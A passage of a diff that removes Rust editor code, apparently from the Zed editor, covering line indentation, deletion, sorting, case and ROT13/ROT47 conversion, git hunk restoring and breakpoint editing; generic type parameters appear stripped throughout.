indent_delta.chars().collect::(), - )); - - // Update this selection's endpoints to reflect the indentation. 
- if row == selection.start.row { - selection.start.column += indent_delta.len; - } - if row == selection.end.row { - selection.end.column += indent_delta.len; - delta_for_end_row = indent_delta.len; - } - } - - if selection.start.row == selection.end.row { - delta_for_start_row + delta_for_end_row - } else { - delta_for_end_row - } - } - - pub fn outdent(&mut self, _: &Outdent, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all::(cx); - let mut deletion_ranges = Vec::new(); - let mut last_outdent = None; - { - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - for selection in &selections { - let settings = buffer.language_settings_at(selection.start, cx); - let tab_size = settings.tab_size.get(); - let mut rows = selection.spanned_rows(false, &display_map); - - // Avoid re-outdenting a row that has already been outdented by a - // previous selection. 
- if let Some(last_row) = last_outdent { - if last_row == rows.start { - rows.start = rows.start.next_row(); - } - } - let has_multiple_rows = rows.len() > 1; - for row in rows.iter_rows() { - let indent_size = snapshot.indent_size_for_line(row); - if indent_size.len > 0 { - let deletion_len = match indent_size.kind { - IndentKind::Space => { - let columns_to_prev_tab_stop = indent_size.len % tab_size; - if columns_to_prev_tab_stop == 0 { - tab_size - } else { - columns_to_prev_tab_stop - } - } - IndentKind::Tab => 1, - }; - let start = if has_multiple_rows - || deletion_len > selection.start.column - || indent_size.len < selection.start.column - { - 0 - } else { - selection.start.column - deletion_len - }; - deletion_ranges.push( - Point::new(row.0, start)..Point::new(row.0, start + deletion_len), - ); - last_outdent = Some(row); - } - } - } - } - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |buffer, cx| { - let empty_str: Arc = Arc::default(); - buffer.edit( - deletion_ranges - .into_iter() - .map(|range| (range, empty_str.clone())), - None, - cx, - ); - }); - let selections = this.selections.all::(cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - }); - } - - pub fn autoindent(&mut self, _: &AutoIndent, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let selections = self - .selections - .all::(cx) - .into_iter() - .map(|s| s.range()); - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |buffer, cx| { - buffer.autoindent_ranges(selections, cx); - }); - let selections = this.selections.all::(cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - }); - } - - pub fn delete_line(&mut self, _: &DeleteLine, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let 
display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all::(cx); - - let mut new_cursors = Vec::new(); - let mut edit_ranges = Vec::new(); - let mut selections = selections.iter().peekable(); - while let Some(selection) = selections.next() { - let mut rows = selection.spanned_rows(false, &display_map); - let goal_display_column = selection.head().to_display_point(&display_map).column(); - - // Accumulate contiguous regions of rows that we want to delete. - while let Some(next_selection) = selections.peek() { - let next_rows = next_selection.spanned_rows(false, &display_map); - if next_rows.start <= rows.end { - rows.end = next_rows.end; - selections.next().unwrap(); - } else { - break; - } - } - - let buffer = &display_map.buffer_snapshot; - let mut edit_start = Point::new(rows.start.0, 0).to_offset(buffer); - let edit_end; - let cursor_buffer_row; - if buffer.max_point().row >= rows.end.0 { - // If there's a line after the range, delete the \n from the end of the row range - // and position the cursor on the next line. - edit_end = Point::new(rows.end.0, 0).to_offset(buffer); - cursor_buffer_row = rows.end; - } else { - // If there isn't a line after the range, delete the \n from the line before the - // start of the row range and position the cursor there. 
- edit_start = edit_start.saturating_sub(1); - edit_end = buffer.len(); - cursor_buffer_row = rows.start.previous_row(); - } - - let mut cursor = Point::new(cursor_buffer_row.0, 0).to_display_point(&display_map); - *cursor.column_mut() = - cmp::min(goal_display_column, display_map.line_len(cursor.row())); - - new_cursors.push(( - selection.id, - buffer.anchor_after(cursor.to_point(&display_map)), - )); - edit_ranges.push(edit_start..edit_end); - } - - self.transact(window, cx, |this, window, cx| { - let buffer = this.buffer.update(cx, |buffer, cx| { - let empty_str: Arc = Arc::default(); - buffer.edit( - edit_ranges - .into_iter() - .map(|range| (range, empty_str.clone())), - None, - cx, - ); - buffer.snapshot(cx) - }); - let new_selections = new_cursors - .into_iter() - .map(|(id, cursor)| { - let cursor = cursor.to_point(&buffer); - Selection { - id, - start: cursor, - end: cursor, - reversed: false, - goal: SelectionGoal::None, - } - }) - .collect(); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }); - }); - } - - pub fn join_lines_impl( - &mut self, - insert_whitespace: bool, - window: &mut Window, - cx: &mut Context, - ) { - if self.read_only(cx) { - return; - } - let mut row_ranges = Vec::>::new(); - for selection in self.selections.all::(cx) { - let start = MultiBufferRow(selection.start.row); - // Treat single line selections as if they include the next line. Otherwise this action - // would do nothing for single line selections individual cursors. 
- let end = if selection.start.row == selection.end.row { - MultiBufferRow(selection.start.row + 1) - } else { - MultiBufferRow(selection.end.row) - }; - - if let Some(last_row_range) = row_ranges.last_mut() { - if start <= last_row_range.end { - last_row_range.end = end; - continue; - } - } - row_ranges.push(start..end); - } - - let snapshot = self.buffer.read(cx).snapshot(cx); - let mut cursor_positions = Vec::new(); - for row_range in &row_ranges { - let anchor = snapshot.anchor_before(Point::new( - row_range.end.previous_row().0, - snapshot.line_len(row_range.end.previous_row()), - )); - cursor_positions.push(anchor..anchor); - } - - self.transact(window, cx, |this, window, cx| { - for row_range in row_ranges.into_iter().rev() { - for row in row_range.iter_rows().rev() { - let end_of_line = Point::new(row.0, snapshot.line_len(row)); - let next_line_row = row.next_row(); - let indent = snapshot.indent_size_for_line(next_line_row); - let start_of_next_line = Point::new(next_line_row.0, indent.len); - - let replace = - if snapshot.line_len(next_line_row) > indent.len && insert_whitespace { - " " - } else { - "" - }; - - this.buffer.update(cx, |buffer, cx| { - buffer.edit([(end_of_line..start_of_next_line, replace)], None, cx) - }); - } - } - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_anchor_ranges(cursor_positions) - }); - }); - } - - pub fn join_lines(&mut self, _: &JoinLines, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.join_lines_impl(true, window, cx); - } - - pub fn sort_lines_case_sensitive( - &mut self, - _: &SortLinesCaseSensitive, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_lines(window, cx, |lines| lines.sort()) - } - - pub fn sort_lines_case_insensitive( - &mut self, - _: &SortLinesCaseInsensitive, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_lines(window, cx, |lines| { - lines.sort_by_key(|line| 
line.to_lowercase()) - }) - } - - pub fn unique_lines_case_insensitive( - &mut self, - _: &UniqueLinesCaseInsensitive, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_lines(window, cx, |lines| { - let mut seen = HashSet::default(); - lines.retain(|line| seen.insert(line.to_lowercase())); - }) - } - - pub fn unique_lines_case_sensitive( - &mut self, - _: &UniqueLinesCaseSensitive, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_lines(window, cx, |lines| { - let mut seen = HashSet::default(); - lines.retain(|line| seen.insert(*line)); - }) - } - - pub fn reload_file(&mut self, _: &ReloadFile, window: &mut Window, cx: &mut Context) { - let Some(project) = self.project.clone() else { - return; - }; - self.reload(project, window, cx) - .detach_and_notify_err(window, cx); - } - - pub fn restore_file( - &mut self, - _: &::git::RestoreFile, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let mut buffer_ids = HashSet::default(); - let snapshot = self.buffer().read(cx).snapshot(cx); - for selection in self.selections.all::(cx) { - buffer_ids.extend(snapshot.buffer_ids_for_range(selection.range())) - } - - let buffer = self.buffer().read(cx); - let ranges = buffer_ids - .into_iter() - .flat_map(|buffer_id| buffer.excerpt_ranges_for_buffer(buffer_id, cx)) - .collect::>(); - - self.restore_hunks_in_ranges(ranges, window, cx); - } - - pub fn git_restore(&mut self, _: &Restore, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let selections = self - .selections - .all(cx) - .into_iter() - .map(|s| s.range()) - .collect(); - self.restore_hunks_in_ranges(selections, window, cx); - } - - pub fn restore_hunks_in_ranges( - &mut self, - ranges: Vec>, - window: &mut Window, - cx: &mut Context, - ) { - let mut revert_changes = HashMap::default(); - let chunk_by = self - .snapshot(window, cx) - .hunks_for_ranges(ranges) - 
.into_iter() - .chunk_by(|hunk| hunk.buffer_id); - for (buffer_id, hunks) in &chunk_by { - let hunks = hunks.collect::>(); - for hunk in &hunks { - self.prepare_restore_change(&mut revert_changes, hunk, cx); - } - self.do_stage_or_unstage(false, buffer_id, hunks.into_iter(), cx); - } - drop(chunk_by); - if !revert_changes.is_empty() { - self.transact(window, cx, |editor, window, cx| { - editor.restore(revert_changes, window, cx); - }); - } - } - - pub fn open_active_item_in_terminal( - &mut self, - _: &OpenInTerminal, - window: &mut Window, - cx: &mut Context, - ) { - if let Some(working_directory) = self.active_excerpt(cx).and_then(|(_, buffer, _)| { - let project_path = buffer.read(cx).project_path(cx)?; - let project = self.project.as_ref()?.read(cx); - let entry = project.entry_for_path(&project_path, cx)?; - let parent = match &entry.canonical_path { - Some(canonical_path) => canonical_path.to_path_buf(), - None => project.absolute_path(&project_path, cx)?, - } - .parent()? - .to_path_buf(); - Some(parent) - }) { - window.dispatch_action(OpenTerminal { working_directory }.boxed_clone(), cx); - } - } - - fn set_breakpoint_context_menu( - &mut self, - display_row: DisplayRow, - position: Option, - clicked_point: gpui::Point, - window: &mut Window, - cx: &mut Context, - ) { - if !cx.has_flag::() { - return; - } - let source = self - .buffer - .read(cx) - .snapshot(cx) - .anchor_before(Point::new(display_row.0, 0u32)); - - let context_menu = self.breakpoint_context_menu(position.unwrap_or(source), window, cx); - - self.mouse_context_menu = MouseContextMenu::pinned_to_editor( - self, - source, - clicked_point, - context_menu, - window, - cx, - ); - } - - fn add_edit_breakpoint_block( - &mut self, - anchor: Anchor, - breakpoint: &Breakpoint, - edit_action: BreakpointPromptEditAction, - window: &mut Window, - cx: &mut Context, - ) { - let weak_editor = cx.weak_entity(); - let bp_prompt = cx.new(|cx| { - BreakpointPromptEditor::new( - weak_editor, - anchor, - 
breakpoint.clone(), - edit_action, - window, - cx, - ) - }); - - let height = bp_prompt.update(cx, |this, cx| { - this.prompt - .update(cx, |prompt, cx| prompt.max_point(cx).row().0 + 1 + 2) - }); - let cloned_prompt = bp_prompt.clone(); - let blocks = vec![BlockProperties { - style: BlockStyle::Sticky, - placement: BlockPlacement::Above(anchor), - height: Some(height), - render: Arc::new(move |cx| { - *cloned_prompt.read(cx).gutter_dimensions.lock() = *cx.gutter_dimensions; - cloned_prompt.clone().into_any_element() - }), - priority: 0, - }]; - - let focus_handle = bp_prompt.focus_handle(cx); - window.focus(&focus_handle); - - let block_ids = self.insert_blocks(blocks, None, cx); - bp_prompt.update(cx, |prompt, _| { - prompt.add_block_ids(block_ids); - }); - } - - pub(crate) fn breakpoint_at_row( - &self, - row: u32, - window: &mut Window, - cx: &mut Context, - ) -> Option<(Anchor, Breakpoint)> { - let snapshot = self.snapshot(window, cx); - let breakpoint_position = snapshot.buffer_snapshot.anchor_before(Point::new(row, 0)); - - self.breakpoint_at_anchor(breakpoint_position, &snapshot, cx) - } - - pub(crate) fn breakpoint_at_anchor( - &self, - breakpoint_position: Anchor, - snapshot: &EditorSnapshot, - cx: &mut Context, - ) -> Option<(Anchor, Breakpoint)> { - let project = self.project.clone()?; - - let buffer_id = breakpoint_position.buffer_id.or_else(|| { - snapshot - .buffer_snapshot - .buffer_id_for_excerpt(breakpoint_position.excerpt_id) - })?; - - let enclosing_excerpt = breakpoint_position.excerpt_id; - let buffer = project.read_with(cx, |project, cx| project.buffer_for_id(buffer_id, cx))?; - let buffer_snapshot = buffer.read(cx).snapshot(); - - let row = buffer_snapshot - .summary_for_anchor::(&breakpoint_position.text_anchor) - .row; - - let line_len = snapshot.buffer_snapshot.line_len(MultiBufferRow(row)); - let anchor_end = snapshot - .buffer_snapshot - .anchor_after(Point::new(row, line_len)); - - let bp = self - .breakpoint_store - .as_ref()? 
- .read_with(cx, |breakpoint_store, cx| { - breakpoint_store - .breakpoints( - &buffer, - Some(breakpoint_position.text_anchor..anchor_end.text_anchor), - &buffer_snapshot, - cx, - ) - .next() - .and_then(|(anchor, bp)| { - let breakpoint_row = buffer_snapshot - .summary_for_anchor::(anchor) - .row; - - if breakpoint_row == row { - snapshot - .buffer_snapshot - .anchor_in_excerpt(enclosing_excerpt, *anchor) - .map(|anchor| (anchor, bp.clone())) - } else { - None - } - }) - }); - bp - } - - pub fn edit_log_breakpoint( - &mut self, - _: &EditLogBreakpoint, - window: &mut Window, - cx: &mut Context, - ) { - for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { - let breakpoint = breakpoint.unwrap_or_else(|| Breakpoint { - message: None, - state: BreakpointState::Enabled, - condition: None, - hit_condition: None, - }); - - self.add_edit_breakpoint_block( - anchor, - &breakpoint, - BreakpointPromptEditAction::Log, - window, - cx, - ); - } - } - - fn breakpoints_at_cursors( - &self, - window: &mut Window, - cx: &mut Context, - ) -> Vec<(Anchor, Option)> { - let snapshot = self.snapshot(window, cx); - let cursors = self - .selections - .disjoint_anchors() - .into_iter() - .map(|selection| { - let cursor_position: Point = selection.head().to_point(&snapshot.buffer_snapshot); - - let breakpoint_position = self - .breakpoint_at_row(cursor_position.row, window, cx) - .map(|bp| bp.0) - .unwrap_or_else(|| { - snapshot - .display_snapshot - .buffer_snapshot - .anchor_after(Point::new(cursor_position.row, 0)) - }); - - let breakpoint = self - .breakpoint_at_anchor(breakpoint_position, &snapshot, cx) - .map(|(anchor, breakpoint)| (anchor, Some(breakpoint))); - - breakpoint.unwrap_or_else(|| (breakpoint_position, None)) - }) - // There might be multiple cursors on the same line; all of them should have the same anchors though as their breakpoints positions, which makes it possible to sort and dedup the list. 
- .collect::>(); - - cursors.into_iter().collect() - } - - pub fn enable_breakpoint( - &mut self, - _: &crate::actions::EnableBreakpoint, - window: &mut Window, - cx: &mut Context, - ) { - for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { - let Some(breakpoint) = breakpoint.filter(|breakpoint| breakpoint.is_disabled()) else { - continue; - }; - self.edit_breakpoint_at_anchor( - anchor, - breakpoint, - BreakpointEditAction::InvertState, - cx, - ); - } - } - - pub fn disable_breakpoint( - &mut self, - _: &crate::actions::DisableBreakpoint, - window: &mut Window, - cx: &mut Context, - ) { - for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { - let Some(breakpoint) = breakpoint.filter(|breakpoint| breakpoint.is_enabled()) else { - continue; - }; - self.edit_breakpoint_at_anchor( - anchor, - breakpoint, - BreakpointEditAction::InvertState, - cx, - ); - } - } - - pub fn toggle_breakpoint( - &mut self, - _: &crate::actions::ToggleBreakpoint, - window: &mut Window, - cx: &mut Context, - ) { - for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { - if let Some(breakpoint) = breakpoint { - self.edit_breakpoint_at_anchor( - anchor, - breakpoint, - BreakpointEditAction::Toggle, - cx, - ); - } else { - self.edit_breakpoint_at_anchor( - anchor, - Breakpoint::new_standard(), - BreakpointEditAction::Toggle, - cx, - ); - } - } - } - - pub fn edit_breakpoint_at_anchor( - &mut self, - breakpoint_position: Anchor, - breakpoint: Breakpoint, - edit_action: BreakpointEditAction, - cx: &mut Context, - ) { - let Some(breakpoint_store) = &self.breakpoint_store else { - return; - }; - - let Some(buffer_id) = breakpoint_position.buffer_id.or_else(|| { - if breakpoint_position == Anchor::min() { - self.buffer() - .read(cx) - .excerpt_buffer_ids() - .into_iter() - .next() - } else { - None - } - }) else { - return; - }; - - let Some(buffer) = self.buffer().read(cx).buffer(buffer_id) else { - return; - }; - - breakpoint_store.update(cx, 
|breakpoint_store, cx| {
            // Delegate the actual add/remove/invert to the store.
            breakpoint_store.toggle_breakpoint(
                buffer,
                (breakpoint_position.text_anchor, breakpoint),
                edit_action,
                cx,
            );
        });

        cx.notify();
    }

    // Test-only accessor for the editor's breakpoint store.
    #[cfg(any(test, feature = "test-support"))]
    pub fn breakpoint_store(&self) -> Option<Entity<BreakpointStore>> {
        self.breakpoint_store.clone()
    }

    /// Queues a revert for `hunk`: looks up the hunk's original (pre-change)
    /// text in the buffer's diff base and records it in `revert_changes`
    /// keyed by buffer id, keeping each buffer's list sorted by range.
    ///
    /// Returns `None` when the hunk represents a newly created file, when the
    /// buffer or its diff cannot be found, or when an entry with the same
    /// range is already queued (the `binary_search_by` hit); `Some(())` when
    /// the revert was recorded.
    // NOTE(review): generic parameters in this signature were reconstructed
    // after extraction stripped them — confirm the `HashMap` value type
    // against the `restore` call site.
    pub fn prepare_restore_change(
        &self,
        revert_changes: &mut HashMap<BufferId, Vec<(Range<text::Anchor>, Rope)>>,
        hunk: &MultiBufferDiffHunk,
        cx: &mut App,
    ) -> Option<()> {
        if hunk.is_created_file() {
            return None;
        }
        let buffer = self.buffer.read(cx);
        let diff = buffer.diff_for(hunk.buffer_id)?;
        let buffer = buffer.buffer(hunk.buffer_id)?;
        let buffer = buffer.read(cx);
        // Slice the original text straight out of the diff's base rope.
        let original_text = diff
            .read(cx)
            .base_text()
            .as_rope()
            .slice(hunk.diff_base_byte_range.clone());
        let buffer_snapshot = buffer.snapshot();
        let buffer_revert_changes = revert_changes.entry(buffer.remote_id()).or_default();
        // Insert in sorted position; an `Ok` result means this exact range is
        // already queued, so nothing is added.
        if let Err(i) = buffer_revert_changes.binary_search_by(|probe| {
            probe
                .0
                .start
                .cmp(&hunk.buffer_range.start, &buffer_snapshot)
                .then(probe.0.end.cmp(&hunk.buffer_range.end, &buffer_snapshot))
        }) {
            buffer_revert_changes.insert(i, (hunk.buffer_range.clone(), original_text));
            Some(())
        } else {
            None
        }
    }

    /// Reverses the order of the selected lines.
    pub fn reverse_lines(&mut self, _: &ReverseLines, window: &mut Window, cx: &mut Context<Self>) {
        self.manipulate_lines(window, cx, |lines| lines.reverse())
    }

    /// Randomly shuffles the order of the selected lines.
    pub fn shuffle_lines(&mut self, _: &ShuffleLines, window: &mut Window, cx: &mut Context<Self>) {
        self.manipulate_lines(window, cx, |lines| lines.shuffle(&mut thread_rng()))
    }

    /// Shared implementation for all line-wise manipulations (sort, unique,
    /// reverse, shuffle, …): expands each selection to whole rows, hands the
    /// rows to `callback` for in-place editing, applies the result as a
    /// single transaction, and rebuilds the selections to track added or
    /// removed lines.
    fn manipulate_lines<Fn>(
        &mut self,
        window: &mut Window,
        cx: &mut Context<Self>,
        mut callback: Fn,
    ) where
        Fn: FnMut(&mut Vec<&str>),
    {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);

        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let buffer = self.buffer.read(cx).snapshot(cx);

        let mut edits = Vec::new();

        let selections = self.selections.all::<Point>(cx);
        let
mut selections = selections.iter().peekable(); - let mut contiguous_row_selections = Vec::new(); - let mut new_selections = Vec::new(); - let mut added_lines = 0; - let mut removed_lines = 0; - - while let Some(selection) = selections.next() { - let (start_row, end_row) = consume_contiguous_rows( - &mut contiguous_row_selections, - selection, - &display_map, - &mut selections, - ); - - let start_point = Point::new(start_row.0, 0); - let end_point = Point::new( - end_row.previous_row().0, - buffer.line_len(end_row.previous_row()), - ); - let text = buffer - .text_for_range(start_point..end_point) - .collect::(); - - let mut lines = text.split('\n').collect_vec(); - - let lines_before = lines.len(); - callback(&mut lines); - let lines_after = lines.len(); - - edits.push((start_point..end_point, lines.join("\n"))); - - // Selections must change based on added and removed line count - let start_row = - MultiBufferRow(start_point.row + added_lines as u32 - removed_lines as u32); - let end_row = MultiBufferRow(start_row.0 + lines_after.saturating_sub(1) as u32); - new_selections.push(Selection { - id: selection.id, - start: start_row, - end: end_row, - goal: SelectionGoal::None, - reversed: selection.reversed, - }); - - if lines_after > lines_before { - added_lines += lines_after - lines_before; - } else if lines_before > lines_after { - removed_lines += lines_before - lines_after; - } - } - - self.transact(window, cx, |this, window, cx| { - let buffer = this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - buffer.snapshot(cx) - }); - - // Recalculate offsets on newly edited buffer - let new_selections = new_selections - .iter() - .map(|s| { - let start_point = Point::new(s.start.0, 0); - let end_point = Point::new(s.end.0, buffer.line_len(s.end)); - Selection { - id: s.id, - start: buffer.point_to_offset(start_point), - end: buffer.point_to_offset(end_point), - goal: s.goal, - reversed: s.reversed, - } - }) - .collect(); - - 
            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(new_selections);
            });

            // NOTE(review): `change_selections` is already passed
            // `Some(Autoscroll::fit())` above — this extra request looks
            // redundant; confirm before removing.
            this.request_autoscroll(Autoscroll::fit(), cx);
        });
    }

    /// Lowercases the selected text if it contains any uppercase character,
    /// otherwise uppercases it.
    pub fn toggle_case(&mut self, _: &ToggleCase, window: &mut Window, cx: &mut Context<Self>) {
        self.manipulate_text(window, cx, |text| {
            let has_upper_case_characters = text.chars().any(|c| c.is_uppercase());
            if has_upper_case_characters {
                text.to_lowercase()
            } else {
                text.to_uppercase()
            }
        })
    }

    /// Converts each selection (or the word under each empty cursor) to
    /// UPPER CASE.
    pub fn convert_to_upper_case(
        &mut self,
        _: &ConvertToUpperCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_uppercase())
    }

    /// Converts each selection (or the word under each empty cursor) to
    /// lower case.
    pub fn convert_to_lower_case(
        &mut self,
        _: &ConvertToLowerCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_lowercase())
    }

    /// Converts the selected text to Title Case. Conversion is applied per
    /// line so embedded newlines are preserved.
    pub fn convert_to_title_case(
        &mut self,
        _: &ConvertToTitleCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.split('\n')
                .map(|line| line.to_case(Case::Title))
                .join("\n")
        })
    }

    /// Converts the selected text to snake_case.
    pub fn convert_to_snake_case(
        &mut self,
        _: &ConvertToSnakeCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_case(Case::Snake))
    }

    /// Converts the selected text to kebab-case.
    pub fn convert_to_kebab_case(
        &mut self,
        _: &ConvertToKebabCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_case(Case::Kebab))
    }

    /// Converts the selected text to UpperCamelCase. Applied per line, like
    /// title case above, so newlines are preserved.
    pub fn convert_to_upper_camel_case(
        &mut self,
        _: &ConvertToUpperCamelCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.split('\n')
                .map(|line| line.to_case(Case::UpperCamel))
                .join("\n")
        })
    }

    /// Converts the selected text to lowerCamelCase.
    pub fn convert_to_lower_camel_case(
        &mut self,
        _: &ConvertToLowerCamelCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| text.to_case(Case::Camel))
    }

    pub fn convert_to_opposite_case(
        &mut self,
        _: &ConvertToOppositeCase,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        // Swap the case of every character. `extend` is used because
        // `to_lowercase`/`to_uppercase` return iterators: a single char may
        // map to multiple chars (e.g. 'ß' -> "SS").
        self.manipulate_text(window, cx, |text| {
            text.chars()
                .fold(String::with_capacity(text.len()), |mut t, c| {
                    if c.is_uppercase() {
                        t.extend(c.to_lowercase());
                    } else {
                        t.extend(c.to_uppercase());
                    }
                    t
                })
        })
    }

    /// Applies the ROT13 substitution cipher to the selected text. Only
    /// ASCII letters are rotated (the byte arithmetic stays inside the
    /// letter range thanks to the match arms); all other characters pass
    /// through unchanged.
    pub fn convert_to_rot13(
        &mut self,
        _: &ConvertToRot13,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.chars()
                .map(|c| match c {
                    'A'..='M' | 'a'..='m' => ((c as u8) + 13) as char,
                    'N'..='Z' | 'n'..='z' => ((c as u8) - 13) as char,
                    _ => c,
                })
                .collect()
        })
    }

    /// Applies the ROT47 cipher: every printable ASCII character (33..=126)
    /// is rotated by 47 within that 94-character range —
    /// `33 + ((cp - 33 + 47) % 94)`, folded here to `33 + ((cp + 14) % 94)`.
    /// Other characters pass through unchanged.
    pub fn convert_to_rot47(
        &mut self,
        _: &ConvertToRot47,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.chars()
                .map(|c| {
                    let code_point = c as u32;
                    if code_point >= 33 && code_point <= 126 {
                        // Result is always in 33..=126, so `unwrap` is safe.
                        return char::from_u32(33 + ((code_point + 14) % 94)).unwrap();
                    }
                    c
                })
                .collect()
        })
    }

    /// Shared implementation for all text transformations (case conversion,
    /// ROT ciphers, …): for each selection, passes the selected text — or,
    /// for an empty selection, the surrounding word — through `callback` and
    /// replaces it with the result, rebuilding selections to cover the
    /// replacement text.
    // NOTE(review): generic parameters reconstructed after extraction
    // stripped them — confirm `<usize>` against `SelectionsCollection::all`.
    fn manipulate_text<Fn>(&mut self, window: &mut Window, cx: &mut Context<Self>, mut callback: Fn)
    where
        Fn: FnMut(&str) -> String,
    {
        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let buffer = self.buffer.read(cx).snapshot(cx);

        let mut new_selections = Vec::new();
        let mut edits = Vec::new();
        // Running delta between old and new text lengths, used to shift the
        // offsets of later selections after earlier replacements.
        let mut selection_adjustment = 0i32;

        for selection in self.selections.all::<usize>(cx) {
            let selection_is_empty = selection.is_empty();

            let (start, end) = if selection_is_empty {
                // Empty selection: operate on the word under the cursor.
                let word_range = movement::surrounding_word(
                    &display_map,
                    selection.start.to_display_point(&display_map),
                );
                let start = word_range.start.to_offset(&display_map, Bias::Left);
                let end = word_range.end.to_offset(&display_map, Bias::Left);
                (start, end)
            } else {
                (selection.start, selection.end)
            };

            let text = buffer.text_for_range(start..end).collect::<String>();
            let old_length = text.len() as i32;
            let text = callback(&text);

new_selections.push(Selection { - start: (start as i32 - selection_adjustment) as usize, - end: ((start + text.len()) as i32 - selection_adjustment) as usize, - goal: SelectionGoal::None, - ..selection - }); - - selection_adjustment += old_length - text.len() as i32; - - edits.push((start..end, text)); - } - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - }); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }); - - this.request_autoscroll(Autoscroll::fit(), cx); - }); - } - - pub fn duplicate( - &mut self, - upwards: bool, - whole_lines: bool, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - let selections = self.selections.all::(cx); - - let mut edits = Vec::new(); - let mut selections_iter = selections.iter().peekable(); - while let Some(selection) = selections_iter.next() { - let mut rows = selection.spanned_rows(false, &display_map); - // duplicate line-wise - if whole_lines || selection.start == selection.end { - // Avoid duplicating the same lines twice. - while let Some(next_selection) = selections_iter.peek() { - let next_rows = next_selection.spanned_rows(false, &display_map); - if next_rows.start < rows.end { - rows.end = next_rows.end; - selections_iter.next().unwrap(); - } else { - break; - } - } - - // Copy the text from the selected row region and splice it either at the start - // or end of the region. 
- let start = Point::new(rows.start.0, 0); - let end = Point::new( - rows.end.previous_row().0, - buffer.line_len(rows.end.previous_row()), - ); - let text = buffer - .text_for_range(start..end) - .chain(Some("\n")) - .collect::(); - let insert_location = if upwards { - Point::new(rows.end.0, 0) - } else { - start - }; - edits.push((insert_location..insert_location, text)); - } else { - // duplicate character-wise - let start = selection.start; - let end = selection.end; - let text = buffer.text_for_range(start..end).collect::(); - edits.push((selection.end..selection.end, text)); - } - } - - self.transact(window, cx, |this, _, cx| { - this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - }); - - this.request_autoscroll(Autoscroll::fit(), cx); - }); - } - - pub fn duplicate_line_up( - &mut self, - _: &DuplicateLineUp, - window: &mut Window, - cx: &mut Context, - ) { - self.duplicate(true, true, window, cx); - } - - pub fn duplicate_line_down( - &mut self, - _: &DuplicateLineDown, - window: &mut Window, - cx: &mut Context, - ) { - self.duplicate(false, true, window, cx); - } - - pub fn duplicate_selection( - &mut self, - _: &DuplicateSelection, - window: &mut Window, - cx: &mut Context, - ) { - self.duplicate(false, false, window, cx); - } - - pub fn move_line_up(&mut self, _: &MoveLineUp, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = self.buffer.read(cx).snapshot(cx); - - let mut edits = Vec::new(); - let mut unfold_ranges = Vec::new(); - let mut refold_creases = Vec::new(); - - let selections = self.selections.all::(cx); - let mut selections = selections.iter().peekable(); - let mut contiguous_row_selections = Vec::new(); - let mut new_selections = Vec::new(); - - while let Some(selection) = selections.next() { - // Find all the selections that span a contiguous row range - let (start_row, 
